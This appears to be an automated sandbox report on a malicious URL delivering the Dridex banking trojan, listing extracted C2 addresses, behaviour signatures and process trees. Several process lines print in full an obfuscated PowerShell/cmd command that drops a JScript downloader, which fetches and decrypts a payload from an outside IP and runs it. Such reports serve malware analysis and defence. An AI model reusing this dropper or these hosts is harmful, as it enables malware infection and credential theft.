Analysis
max time kernel: 253s
max time network: 254s
platform: windows7_x64
resource: win7v20201028
submitted: 16-11-2020 11:25
Static task
static1
URLScan task
urlscan1
Sample
https://tracker.usemoney.xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI
Behavioral task
behavioral1
Sample
https://tracker.usemoney.xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI
Resource
win7v20201028
Behavioral task
behavioral2
Sample
https://tracker.usemoney.xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI
Resource
win7v20201028
General
-
Target
https://tracker.usemoney.xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI
Malware Config
Extracted
dridex
10111
194.150.118.7:443
49.212.179.180:3889
69.64.62.4:4443
Signatures
-
Processes:
resource: behavioral2/memory/780-62-0x0000000000400000-0x000000000043D000-memory.dmp
yara_rule: dridex_ldr
Blocklisted process makes network request 2 IoCs
Processes:
flow  pid   process
19    1352  wscript.exe
20    1512  wscript.exe
Executes dropped EXE 1 IoCs
Processes:
pid  process
780  djadi.exe
Loads dropped DLL 2 IoCs
Processes:
pid   process
1820  cmd.exe
1820  cmd.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
description: Key value queried
ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
process: djadi.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
pid   process
1252  PowerShell.exe
748   PowerShell.exe
1252  PowerShell.exe
748   PowerShell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  1252  PowerShell.exe
Token: SeDebugPrivilege  748   PowerShell.exe
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid   process
1772  iexplore.exe
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
pid   process
1772  iexplore.exe
1772  iexplore.exe
844   IEXPLORE.EXE
844   IEXPLORE.EXE
1164  IEXPLORE.EXE
1164  IEXPLORE.EXE
1264  IEXPLORE.EXE
1264  IEXPLORE.EXE
1264  IEXPLORE.EXE
1264  IEXPLORE.EXE
Suspicious use of WriteProcessMemory 44 IoCs
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://tracker.usemoney.xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:2
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?MzE2ODE2^&etwFDTh^&bCbREhj=filly^&VTZ=consignment^&ohjgjhdfg5=wn_QMvXcLhXQFYPCJPPcTKREM1HRHESD2YubnLG3Yp_NZGX_0_HDfF_wrwrcCl6JtcMoL^&HTOqRDUr=abettor^&hfghfgcv3=roCbFHghEWJegYznYwJUF5BpqGvhkKEzBXNhJWE_BTeZA1G_5KcJLA92VnxzIFJMMgm9w^&yCi=accelerator^&JEiQb=border^&UVcGD=mustard^&ceSzWJ=filly^&Wajv=neighboring^&YmcyIHZL=community^&nkIl=difference^&LIWRIRsPQ=disagree^&MsVpBcv=mustard^&NiLrfEXSQNzkxNTE= "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tmp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?MzE2ODE2^&etwFDTh^&bCbREhj=filly^&VTZ=consignment^&ohjgjhdfg5=wn_QMvXcLhXQFYPCJPPcTKREM1HRHESD2YubnLG3Yp_NZGX_0_HDfF_wrwrcCl6JtcMoL^&HTOqRDUr=abettor^&hfghfgcv3=roCbFHghEWJegYznYwJUF5BpqGvhkKEzBXNhJWE_BTeZA1G_5KcJLA92VnxzIFJMMgm9w^&yCi=accelerator^&JEiQb=border^&UVcGD=mustard^&ceSzWJ=filly^&Wajv=neighboring^&YmcyIHZL=community^&nkIl=difference^&LIWRIRsPQ=disagree^&MsVpBcv=mustard^&NiLrfEXSQNzkxNTE= 14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?MzE2ODE2&etwFDTh&bCbREhj=filly&VTZ=consignment&ohjgjhdfg5=wn_QMvXcLhXQFYPCJPPcTKREM1HRHESD2YubnLG3Yp_NZGX_0_HDfF_wrwrcCl6JtcMoL&HTOqRDUr=abettor&hfghfgcv3=roCbFHghEWJegYznYwJUF5BpqGvhkKEzBXNhJWE_BTeZA1G_5KcJLA92VnxzIFJMMgm9w&yCi=accelerator&JEiQb=border&UVcGD=mustard&ceSzWJ=filly&Wajv=neighboring&YmcyIHZL=community&nkIl=difference&LIWRIRsPQ=disagree&MsVpBcv=mustard&NiLrfEXSQNzkxNTE= 15⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c djadi.exe
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\djadi.exe
djadi.exe
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:340994 /prefetch:2
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?NDc2ODM3^&ihcvWpRrq^&NKzW=irreverent^&eHlPRdjuM=border^&KCvwqAaL=disagree^&bauGNAYyB=professional^&CDXgqQgGI=abettor^&XiPLJ=difference^&KhpVstUR=neighboring^&ohjgjhdfg5=z3zQMvXcJwDQC4rCJOXAT6FbNk3YH1iOwJH_783ORZzxOWPPk-rBDV3xrh3yT^&vNO=callous^&hfghfgcv3=1WDpKEkLLJZPFHgjxGEKQQwlIZeA19C86utiECGzBGcgJ6y_hOIZg11otKWJA^&queHTbi=consignment^&ZYCNHy=filly^&ZQwWEDouB=community^&JfHK=disagree^&xLnlKUhhWMzAzOTkx "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tmp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?NDc2ODM3^&ihcvWpRrq^&NKzW=irreverent^&eHlPRdjuM=border^&KCvwqAaL=disagree^&bauGNAYyB=professional^&CDXgqQgGI=abettor^&XiPLJ=difference^&KhpVstUR=neighboring^&ohjgjhdfg5=z3zQMvXcJwDQC4rCJOXAT6FbNk3YH1iOwJH_783ORZzxOWPPk-rBDV3xrh3yT^&vNO=callous^&hfghfgcv3=1WDpKEkLLJZPFHgjxGEKQQwlIZeA19C86utiECGzBGcgJ6y_hOIZg11otKWJA^&queHTbi=consignment^&ZYCNHy=filly^&ZQwWEDouB=community^&JfHK=disagree^&xLnlKUhhWMzAzOTkx 14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?NDc2ODM3&ihcvWpRrq&NKzW=irreverent&eHlPRdjuM=border&KCvwqAaL=disagree&bauGNAYyB=professional&CDXgqQgGI=abettor&XiPLJ=difference&KhpVstUR=neighboring&ohjgjhdfg5=z3zQMvXcJwDQC4rCJOXAT6FbNk3YH1iOwJH_783ORZzxOWPPk-rBDV3xrh3yT&vNO=callous&hfghfgcv3=1WDpKEkLLJZPFHgjxGEKQQwlIZeA19C86utiECGzBGcgJ6y_hOIZg11otKWJA&queHTbi=consignment&ZYCNHy=filly&ZQwWEDouB=community&JfHK=disagree&xLnlKUhhWMzAzOTkx 15⤵
- Blocklisted process makes network request
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:209934 /prefetch:2
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads